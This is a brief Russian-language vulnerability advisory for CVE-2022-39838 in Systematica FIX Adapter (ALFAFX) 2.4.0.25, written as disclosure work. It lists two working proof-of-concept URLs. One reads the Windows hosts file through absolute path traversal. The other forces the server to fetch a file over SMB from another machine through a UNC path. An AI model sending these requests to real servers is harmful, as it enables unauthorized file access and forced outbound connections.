
Эксплойт для проверки концепции для CVE-2022-39838, демонстрирующий удаленное включение файлов и абсолютный обход пути в Systematica FIX Adapter (ALFAFX) 2.4.0.25 через HTTP-запросы.
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 позволяет удаленное включение файла через UNC-путь, а также абсолютный path traversal к локальным путям.
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
Некорректный контроль доступа
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
Удаленная
true
Удаленный пользователь может получить доступ к произвольному файлу в ОС через абсолютный путь. Также удаленный пользователь может принудить уязвимый сервер запросить файл с другой машины через SMB.
Ivashchenko Sergey (Jet Infosystems, jet.su)